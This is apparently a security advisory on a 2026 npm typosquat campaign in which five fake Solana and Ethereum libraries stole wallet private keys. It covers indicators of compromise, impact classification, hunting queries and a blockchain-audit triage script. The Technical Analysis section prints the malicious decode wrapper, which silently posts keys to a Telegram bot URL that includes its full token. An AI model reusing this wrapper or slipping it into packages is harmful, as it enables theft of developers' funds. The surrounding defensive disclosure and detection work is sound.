Crypto Private Key Stealer Solana/Ethereum Typosquats
On March 24, 2026, threat actors targeted cryptocurrency developers on the npm registry by typosquatting common Solana and Ethereum libraries. The malicious packages silently harvested and exfiltrated wallet private keys to a Telegram Bot C2.
Executive Summary
On March 24, 2026, a highly targeted typosquat campaign was identified on the npm registry, focusing on cryptocurrency and DeFi developers (Socket.dev Advisory). The threat actor, operating via the Telegram handle @crypto_sol3 and the npm publisher account galedonovan (npm Registry API), uploaded five malicious packages: raydium-bs58, base-x-64, bs58-basic, ethersproject-wallet, and base_xd. These packages were designed to typosquat highly popular utility libraries used for cryptography and wallet operations. Once imported and run, they hijacked core decoding and wallet constructor functions, silently harvesting private keys and exfiltrating them via HTTP POST requests to a controlled Telegram Bot (@Test20131_Bot). Because the exfiltration payload did not crash the host application and returned the expected outputs, the compromise could remain active in developer environments and production backend applications for extended periods without detection. Out of caution, security teams must inspect all lockfiles for these malicious dependencies, isolate any compromised endpoints, and immediately rotate any private keys exposed during the incident window.
Key Facts
threat_type: "Registry typosquatting and runtime private key exfiltration malware"
ecosystem: "npm, javascript"
registry: "npm Registry"
affected_packages:
- "raydium-bs58"
- "base-x-64"
- "bs58-basic"
- "ethersproject-wallet"
- "base_xd"
malicious_versions:
- "1.0.0"
fixed_versions: []
safe_versions:
- "bs58"
- "@ethersproject/wallet"
exposure_window: "2026-03-24T00:00:00Z to 2026-03-24T18:00:00Z"
execution_trigger: "Import of the typosquatted libraries and invocation of decoding or wallet constructor functions"
primary_impact: "Stealth exfiltration of high-value cryptocurrency wallet private keys"
known_iocs:
- "7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw"
- "-4690814032"
- "api.telegram.org"
confidence: "high"
canonical_source: "https://socket.dev/blog/5-malicious-npm-packages-typosquat-solana-and-ethereum-libraries-steal-private-keys"
Source Confidence & Evidence Mapping
- confirmed:
  - The publisher galedonovan published 5 packages: raydium-bs58, base-x-64, bs58-basic, ethersproject-wallet, and base_xd on 2026-03-24. Sources: Socket.dev Advisory, npm Registry API
  - Malicious packages exfiltrate intercepted keys via the Telegram bot endpoint https://api.telegram.org/bot7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw/sendMessage. Source: Socket.dev Advisory
- likely:
  - The threat actor @crypto_sol3 operates the exfiltration channel and maintains ownership of the target chat ID -4690814032. Source: Socket.dev Advisory
- unclear:
  - The total number of private keys successfully stolen and the monetary value of funds drained from compromised developer wallets before the packages were removed. Source: npm Registry API
Impact Determination
| Classification | Criteria | Required evidence | Required action | Closure condition |
|---|---|---|---|---|
| Confirmed compromise | raydium-bs58, base-x-64, bs58-basic, ethersproject-wallet, or base_xd was installed and the application executed decoding or constructor functions. | Dependency configs or build outputs showing installation plus network proxy/DNS query records of egress to api.telegram.org/bot7231970337. | Isolate affected host machines or containers, audit public blockchain ledgers, and sweep all remaining funds to a new, cold-stored wallet. | Complete migration of assets to safe hardware wallets, and verification of zero active egress to the threat C2. |
| Presumed exposed | The package is found in project directories or package caches, but active exfiltration telemetry is missing or unavailable. | Lockfile, pnpm-lock.yaml, yarn.lock, or local npm package cache indices showing resolution of the compromised packages. | Rotate all keys available to the environment and perform a complete dependency purge. | Lockfile resolved without typosquats, local cache purged, and credential owners confirm replacement keys are deployed. |
| Potentially exposed | The package appears in development repository manifests or historical package requirements, but actual node_modules deployment is unverified. | package.json manifest listing the package name, or unverified build pipelines during the incident window. | Perform EDR and lockfile scanning to determine if the package was successfully pulled and loaded. | Dispositions established for all endpoints as confirmed compromise, presumed exposed, or not exposed. |
| Not exposed | The package does not appear in any repositories, manifests, build scripts, caches, or network traffic logs. | Complete negative grep search results from lockfiles and DNS egress query logs for api.telegram.org/bot7231970337. | None. | No indicators present in any monitored environments. |
| Unknown | Telemetry, lockfiles, or network proxy logs for the incident window are missing or incomplete. | Deleted proxy history, missing build records, or unmonitored local developer workstations. | Reconstruct historical dependency graphs from git history and perform retrospective EDR analysis on developer endpoints. | Retrieval of full operational telemetry, or forced key rotation completed out of caution. |
Timeline
- 2026-03-24T00:00:00Z: Five malicious typosquat packages are uploaded to the npm registry under the account galedonovan.
- 2026-03-24T08:00:00Z: Socket.dev threat scanners flag anomalous exfiltration code in raydium-bs58 targeting private key decoding blocks.
- 2026-03-24T18:00:00Z: npm registry administrators take down all five malicious packages from the registry.
- 2026-03-24T19:00:00Z: Public advisory and IOCs are published by Socket.dev.
What Happened
On March 24, 2026, an attacker identified by the Telegram handle @crypto_sol3 attempted a targeted supply chain harvest of cryptocurrency credentials on the npm registry (Socket.dev Advisory). The threat actor created an npm profile under the name galedonovan and published a cluster of 5 packages mimicking popular cryptographic and blockchain utilities (npm Registry API).
Rather than deploying a multi-stage backdoor, the packages modified core API entry points to intercept variables in-flight. When developers fell victim to the typosquatted packages, their normal application code executed successfully, but their private keys were quietly replicated and exfiltrated to the actor’s Telegram bot.
Technical Analysis
The typosquatted packages utilized direct function wrapping to hijack cryptographic inputs. In raydium-bs58, the package mimics the widely adopted bs58 package used heavily in the Solana ecosystem for encoding and decoding base58 transaction payloads.
The package wraps the standard decode method. The malicious payload executes inside the function wrapper:
```javascript
const bs58 = require('bs58');
const axios = require('axios');

exports.decode = function (string) {
  // Exfiltrate the target private key base58 string
  axios.post('https://api.telegram.org/bot7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw/sendMessage', {
    chat_id: '-4690814032',
    text: `Stolen Solana Key: ${string}`
  }).catch(() => {}); // Catch block ensures no network errors crash the host application

  // Return standard execution to avoid suspicion
  return bs58.decode(string);
};
```
Similarly, in ethersproject-wallet, the package targets Ethereum developers by mimicking the @ethersproject/wallet package, wrapping the Wallet class constructor and intercepting the private key hex strings or mnemonics passed to it during instantiation. Because these libraries are typically executed on local developer machines or application servers, the private keys were harvested immediately when active transactions or wallet deployments occurred.
Affected Assets and Blast Radius
- Ecosystem: npm (JavaScript, TypeScript)
- Registry: registry.npmjs.org
- Malicious Packages: raydium-bs58, base-x-64, bs58-basic, ethersproject-wallet, base_xd
- Malicious Versions: 1.0.0
- Credentials at Risk: Solana wallet private keys (base58 format), Ethereum wallet private keys (hex format), mnemonics, and seed phrases.
- Blast Radius: Limited to developers and Web3 backend nodes that mistakenly resolved the typosquatted libraries within the 18-hour publication window.
Indicators of Compromise
- npm Packages: raydium-bs58@1.0.0, base-x-64@1.0.0, bs58-basic@1.0.0, ethersproject-wallet@1.0.0, base_xd@1.0.0
- Telegram C2 Endpoints:
https://api.telegram.org/bot7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw/sendMessage
- Threat Actor Telemetry:
  - Telegram handle: @crypto_sol3
  - Telegram Chat ID: -4690814032
  - npm publisher profile: galedonovan
Detection and Hunting
To detect potential compromise within development repositories and historical egress logs, security analysts should run targeted inventory and network queries.
Hunt Recipe: Lockfile and dependency typosquat inventory
hunt_name: "Solana/Ethereum typosquats lockfile inventory"
telemetry_source: "Ecosystem manifests and lockfiles"
query_language: "bash"
command_or_query: "grep -E 'raydium-bs58|base-x-64|bs58-basic|ethersproject-wallet|base_xd' package-lock.json pnpm-lock.yaml yarn.lock package.json"
output_fields:
- "file_name"
- "line_number"
- "matched_text"
positive_signal: "Lockfile matches one of the malicious package names, indicating that the typosquatted package was resolved."
false_positive_notes: "None. These package names are strictly malicious."
escalation: "Isolate the node/host immediately and sweep funds from all associated keys."
Hunt Recipe: Telegram Bot Exfiltration Outbound Telemetry
hunt_name: "Outbound Telegram Bot exfiltration query"
telemetry_source: "Egress Proxy / Web Gateway Logs"
query_language: "kql"
command_or_query: "WebGatewayLogs | where RequestURL contains \"bot7231970337:AAExyV3dvbNs6xkMJB7S2hArUash9owd-bw\""
output_fields:
- "timestamp"
- "source_ip"
- "request_method"
- "destination_url"
- "http_status"
positive_signal: "Egress traffic matches the threat actor's Telegram bot token."
false_positive_notes: "None. The Telegram bot token is strictly unique to this campaign."
escalation: "Initiate emergency blockchain wallet key replacement procedures."
Downstream Abuse Audits
Audit Module: Public blockchain transaction audit
platform: "Solana and Ethereum blockchains"
question_answered: "Were exfiltrated private keys used to transfer assets, drain tokens, or sign unauthorized transactions?"
required_access:
- "Public blockchain explorer API access"
- "Known affected wallet addresses"
telemetry_source:
- "Solana RPC"
- "Ethereum explorer or RPC transaction history"
time_window: "2026-03-24T00:00:00Z through wallet replacement completion"
commands:
  - |
    curl -s 'https://api.mainnet-beta.solana.com' \
      -X POST \
      -H 'Content-Type: application/json' \
      -d '{"jsonrpc":"2.0","id":1,"method":"getSignaturesForAddress","params":["<affected_solana_address>",{"limit":20}]}'
output_fields:
- "signature"
- "slot"
- "err"
- "memo"
- "blockTime"
suspicious_conditions:
- "Asset transfer or signing activity after 2026-03-24T00:00:00Z that does not align with authorized wallet operations."
false_positive_notes: "Scheduled treasury moves and exchange sweeps can overlap; compare signer, destination, and approved transfer windows."
remediation_trigger: "Active draining or unauthorized signing activity triggers immediate wallet sweep and key replacement from a clean signer."
evidence_to_preserve:
- "raw RPC response"
- "destination addresses"
- "transaction signatures"
- "wallet owner approval record"
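The audit module above returns a list of signatures; the triage step is to separate activity inside the incident window from approved treasury operations, and to keep entries without a `blockTime` visible rather than dropping them. The following script is an added example for this page, not tooling from Socket.dev or the Solana project. The window start is the advisory's 2026-03-24T00:00:00Z; the RPC response, signatures, slots and approval set are constructed placeholders.

```javascript
// Added example: triage a getSignaturesForAddress response against the incident
// window from the audit module. Window start is the advisory's timestamp; the
// RPC response and approval record below are constructed, not real chain data.

const INCIDENT_START_UNIX = Date.parse('2026-03-24T00:00:00Z') / 1000; // blockTime is unix seconds

// Returns signatures that post-date the window start and have no approval
// record, plus entries whose blockTime is null (the node could not attach a
// time) so they get reviewed by slot instead of silently disappearing.
function triageSignatures(rpcResponse, approvedSignatures, startUnix = INCIDENT_START_UNIX) {
  const body = typeof rpcResponse === 'string' ? JSON.parse(rpcResponse) : rpcResponse;
  if (body.error) throw new Error(`RPC error ${body.error.code}: ${body.error.message}`);
  const flagged = [];
  const unknownTime = [];
  for (const entry of body.result || []) {
    if (entry.blockTime == null) { unknownTime.push(entry.signature); continue; }
    if (entry.blockTime < startUnix) continue;              // pre-incident activity
    if (approvedSignatures.has(entry.signature)) continue; // matched to an approval record
    flagged.push({
      signature: entry.signature,
      slot: entry.slot,
      blockTime: new Date(entry.blockTime * 1000).toISOString(),
      failed: entry.err !== null, // a failed transaction still proves the key was used
      memo: entry.memo,
    });
  }
  // Preserve the raw response alongside findings (evidence_to_preserve above).
  return { flagged, unknownTime, raw: body };
}

// Constructed sample response; signatures and slots are placeholders.
const SAMPLE_RPC_RESPONSE = JSON.stringify({
  jsonrpc: '2.0', id: 1,
  result: [
    { signature: 'SIG_AFTER_UNAPPROVED', slot: 330000300, err: null, memo: null, blockTime: INCIDENT_START_UNIX + 7200 },
    { signature: 'SIG_AFTER_FAILED', slot: 330000250, err: { InstructionError: [0, { Custom: 1 }] }, memo: null, blockTime: INCIDENT_START_UNIX + 5400 },
    { signature: 'SIG_AFTER_APPROVED', slot: 330000200, err: null, memo: 'treasury sweep #42', blockTime: INCIDENT_START_UNIX + 3600 },
    { signature: 'SIG_BEFORE', slot: 329990000, err: null, memo: null, blockTime: INCIDENT_START_UNIX - 86400 },
    { signature: 'SIG_NO_TIME', slot: 100, err: null, memo: null, blockTime: null },
  ],
});
// Constructed stand-in for the wallet owner approval record.
const APPROVED_SIGNATURES = new Set(['SIG_AFTER_APPROVED']);

function runAudit() {
  return triageSignatures(SAMPLE_RPC_RESPONSE, APPROVED_SIGNATURES);
}

if (typeof require !== 'undefined' && require.main === module) {
  const { flagged, unknownTime } = runAudit();
  console.log(JSON.stringify({ flagged, unknownTime }, null, 2));
}
```

Feed `triageSignatures` the body returned by the curl command in the audit module, page with the `before` parameter until `blockTime` drops below the window start, and treat any non-empty `flagged` list as the remediation trigger defined above; the approval set should come from the wallet owner's record, not from memo text, since a memo is attacker-controllable.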
Sources
- Socket.dev Threat Research - Role: PRIMARY_RESEARCH - Impact: Detailed campaign discovery, package listings, exfiltration tokens, and bot context.
- npm Registry Package API - Role: DIRECT_SOURCE - Impact: Publishing timeline, package takedown confirmation, and account profile metadata.